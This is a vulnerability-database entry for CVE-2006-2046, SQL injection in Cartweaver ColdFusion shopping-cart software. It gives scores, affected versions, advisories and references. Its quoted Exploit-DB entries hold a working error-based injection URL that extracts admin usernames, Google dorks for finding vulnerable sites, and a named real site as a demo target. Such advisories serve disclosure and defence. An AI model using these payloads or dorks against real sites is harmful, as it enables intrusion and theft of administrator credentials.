CVE-2006-2046
Published 2006-04-26
Priority: P3 38 · medium · CVSS 2.0 base score 6.4 (vector AV:N/AC:L/Au:N/C:P/I:P/A:N)
Exploit available
EPSS: 4.05% (89.4th percentile)
Multiple SQL injection vulnerabilities in Application Dynamics Cartweaver ColdFusion 2.16.11 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) category and (2) keywords parameters in (a) Results.cfm, and the (3) ProdID parameter in (b) Details.cfm.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| application_dynamics | cartweaver | — | — |
| application_dynamics | cartweaver_coldfusion | <= 2.16.11 | — |
GHSA
GHSA-c88w-8m4x-2r4w: SQL injection vulnerability in details
ghsa_unreviewed · 2022-05-01 · CVSS 6.4 · CVE-2008-2918 [MEDIUM] · CWE-89
SQL injection vulnerability in details.php in Application Dynamics Cartweaver 3.0 allows remote attackers to execute arbitrary SQL commands via the prodId parameter, possibly a related issue to CVE-2006-2046.
GHSA
GHSA-4hp9-9cg9-jj2r: Multiple SQL injection vulnerabilities in Application Dynamics Cartweaver ColdFusion 2
ghsa_unreviewed · 2022-05-01 · CVE-2006-2046 [MEDIUM]
Multiple SQL injection vulnerabilities in Application Dynamics Cartweaver ColdFusion 2.16.11 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) category and (2) keywords parameters in (a) Results.cfm, and the (3) ProdID parameter in (b) Details.cfm.
No detection rules found.
Exploit-DB
Cartweaver 2.16.11 - 'ProdID' SQL Injection
exploitdb · 2007-08-06 · CVE-2006-2046
---
author:meoconx[at]vnbrain.net
product:CartWeaver
main site:www.cartweaver.com
1.with CFM CartWeaver:
sql injection in:
Details.cfm?ProdID=a'
demo:
http://www.jbracing.co.uk/Details.cfm?ProdID=1'
exploit:
http://www.xxx.com/Details.cfm?ProdID=[sql query]
link admin:
http://www.xxx.com/[script path]/cw2/admin/
dork:
allinurl:Details.cfm ?ProdID=
allinurl:Results.cfm?category=
An example:
http://www.xxxxx.co.uk/Details.cfm?ProdID=1'
exploit it:
-get username:
http://www.xxxxx.co.uk/Details.cfm?ProdID=1%20and%201=convert(int,(select%20top%201%20admin_username%20from%20tbl_adminusers))
Conversion failed when converting the nvarchar value 'jim' to data type int.
==> the username is "jim"
-get password:
http://www.xxxxx.co.uk/Details.cfm?ProdID=1
Exploit-DB
Cartweaver 2.16.11 - 'Results.cfm' SQL Injection
exploitdb · 2006-04-25 · CVE-2006-2046
---
source: https://www.securityfocus.com/bid/17941/info
Cartweaver ColdFusion is prone to SQL-injection vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input before using it in SQL queries.
Successful exploits could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
http://www.example.com/Results.cfm?category=[SQL]
http://www.example.com/Results.cfm?keywords=[SQL]
No writeups or analysis indexed.
References
http://pridels0.blogspot.com/2006/04/cartweaver-coldfusion-vuln.html
http://secunia.com/advisories/19812
http://www.osvdb.org/24961
http://www.osvdb.org/24962
http://www.securityfocus.com/bid/17941
http://www.securityfocus.com/bid/25210
http://www.techfeed.net/blog/index.cfm/2006/4/26/cartweaver-holes
http://www.vupen.com/english/advisories/2006/1513
https://exchange.xforce.ibmcloud.com/vulnerabilities/26060
https://www.exploit-db.com/exploits/4264